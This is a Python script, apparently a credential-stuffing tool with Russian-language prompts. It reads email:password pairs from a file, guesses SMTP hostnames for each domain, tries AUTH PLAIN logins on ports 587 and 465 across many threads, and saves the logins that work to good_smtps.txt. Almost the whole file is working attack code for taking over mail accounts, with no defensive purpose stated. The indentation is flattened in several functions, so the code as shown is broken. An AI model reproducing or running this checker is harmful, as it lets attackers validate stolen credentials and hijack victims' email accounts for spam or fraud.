#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import ssl
import sys
import time
import random
import base64
import smtplib
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed
from loguru import logger
from datetime import datetime
import traceback
import socket
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
GREY = "\033[90m"
RED = "\033[91m"
GREEN = "\033[92m"
GREENYELOOW = '\033[33m'
YELLOW = "\033[93m"
ORANGE = '\033[31m'
BLUE = "\033[94m"
VIOLET = '\033[95m'
CYAN = '\033[96m'
WHITE = "\033[37m"
def formatter(record):
    """Return the loguru format template for one log record.

    As a side effect, stores a short exception summary (type and message,
    without the traceback) in ``record["extra"]["error_only"]`` so the
    template can reference it. The summary is an empty string when the
    record carries no exception.
    """
    exc_info = record["exception"]
    if exc_info is not None:
        exc_type, exc_value, _ = exc_info
        summary = "".join(traceback.format_exception_only(exc_type, exc_value))
    else:
        summary = ""
    record["extra"]["error_only"] = summary
    return "{time:YYYY-MM-DD at HH:mm:ss} || {level} || {message}\n{extra[error_only]}"
logger.remove()
logger.add(sys.stderr, format=formatter, level="INFO")
logger.add(
"checker.log",
level="WARNING",
format=formatter,
rotation="5 MB",
encoding='utf8',
diagnose=True,
backtrace=True,
)
PREFIX_LST = [
'',
'smtp.',
'mail.',
'smtp2.',
'pop.',
'pop3.',
'smtp-mail.',
'smtpout.'
]
PORT_LST = ['587', '465']
mail_list_file_path = f"{os.getcwd()}\\emails.txt"
def read_file(file_path: str) -> list:
    """Read a text file and return its content split on newline characters.

    Empty lines are kept as empty strings; a trailing newline in the file
    yields a final empty element.
    """
    with open(file_path, 'r') as handle:
        content = handle.read()
    return content.split('\n')
def overwriting_file_without_empty_lines(file_path: str, array: list):
    """Overwrite the file with the non-empty entries of ``array``.

    Entries are written one per line, separated by a newline, with no
    newline after the last entry. Falsy entries (such as empty strings)
    are dropped.
    """
    kept = [entry for entry in array if entry]
    with open(file_path, 'w') as handle:
        handle.write('\n'.join(kept))
def deleting_empty_lines_in_file(file_path: str) -> None:
    """Rewrite the file in place with its empty lines removed."""
    # The file is read in full before it is reopened for writing.
    overwriting_file_without_empty_lines(file_path, read_file(file_path))
def get_not_empty_list(file_path: str) -> list or None:
    """Return the lines of the file after stripping its empty lines in place.

    If the file has zero size, a message is printed and the process is
    terminated immediately with exit status 1.
    """
    if os.stat(file_path).st_size == 0:
        print('{} is empty'.format(file_path))
        os._exit(1)
    deleting_empty_lines_in_file(file_path)
    return read_file(file_path)
def add_bad(mail: str, password: str) -> None:
with open('bad_mail.txt', 'a') as fw:
fw.write(f'{mail}:{password}\n')
@logger.catch
def check_one_email(data: tuple) -> None:
index, prompt = data[0], data[1]
try:
if ';' in prompt:
if ':' not in prompt:
prompt = prompt.replace(';', ':', 1)
mail = prompt.split(':')[0]
password = prompt.split(':')[1]
print('{0}[{1}{2}{0}] {1}Обработка->{3} {4}'.format(
CYAN, GREY, index, WHITE, prompt
))
userhost = mail.split('@')[-1]
base64_str = (f"\x00{mail}\x00{password}").encode()
base64_str = base64.b64encode(base64_str)
authMsg = "AUTH PLAIN ".encode() + base64_str + "\r\n".encode()
isGood = False
for port in PORT_LST:
for prefix in PREFIX_LST:
host = f'{prefix}{userhost}'
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(5.0)
try:
sock.connect((host, int(port)))
sock.setblocking(0) # неблокирующий ввод-вывод
sock.settimeout(None)
if port == '465':
sock = ssl.wrap_socket(sock)
data = sock.recv(1024)
if data[0:3].decode() != '220':
continue
sock.send(b'EHLO ADMIN\r\n')
res1 = sock.recv(1024)
if res1[0:3].decode() != '250':
continue
sock.send(authMsg)
res2 = sock.recv(1024)
if res2[0:3].decode() != '235':
continue
smtp_line = "{}|{}|{}|{}".format(
host, port, mail, password
)
print(
'{}[+] {}{}'.format(
GREEN, smtp_line, ENDC
)
)
isGood = True
with open('good_smtps.txt', 'a') as fw:
fw.write(f'{smtp_line}\n')
break
except OSError:
logger.debug(f"OSError {host}:{port}")
pass
except ConnectionRefusedError:
logger.debug(f"ConnectionRefusedError {host}:{port}")
break
except ConnectionResetError:
logger.debug(f"ConnectionResetError {host}:{port}")
break
except Exception as ex:
logger.error(f"{host}:{port}\n{ex}")
continue
if isGood:
break
if not isGood:
add_bad(mail, password)
except Exception as ex:
logger.exception(f"{ex} >>> {prompt}")
def get_dataset(mail_lst: list) -> list:
    """Pair every entry of ``mail_lst`` with its 1-based position.

    Returns a list of ``(index, entry)`` tuples in the original order.
    """
    return list(enumerate(mail_lst, 1))
@logger.catch
def main(dataset: list):
with ThreadPoolExecutor(S_THREADS) as executor:
results = [
executor.submit(check_one_email, data) for data in dataset
]
for future in as_completed(results):
try:
future.result()
except Exception as ex:
logger.exception("Error in main foo {}", ex)
if __name__ == '__main__':
try:
with open('checker.log', 'a+', encoding='utf-8') as fw:
fw.write("-------------------------------------------\n")
fw.write(f"[ START CHECK ] {datetime.now()}\n")
fw.write("-------------------------------------------\n")
separator = '-' * 51
os.system('cls')
print(f'{GREENYELOOW}+{separator}+')
mail_lst = get_not_empty_list(mail_list_file_path)
with open('good_smtps.txt', 'w'):
pass
while True:
print(f'{GREENYELOOW}+{separator}+')
S_THREADS = int(input(f'{GREENYELOOW}[!] Выберите количество потоков(min=10, max=100):{ENDC} '))
if isinstance(S_THREADS, int):
break
print(f'{GREENYELOOW}+{separator}+{WHITE}')
print(
f'{WHITE}[!] В обработке {len(mail_lst)} emails{ENDC}'
)
print()
print()
dataset = get_dataset(mail_lst)
res = threading.Thread(
target=main,
args=(dataset,),
daemon=True,
)
res.start()
res.join()
# print(res.is_alive())
print(f"\n{GREEN}END{WHITE}")
os._exit(1)
except KeyboardInterrupt:
logger.info('Скрипт остановлен')
os._exit(1)
except Exception as ex:
logger.exception(ex)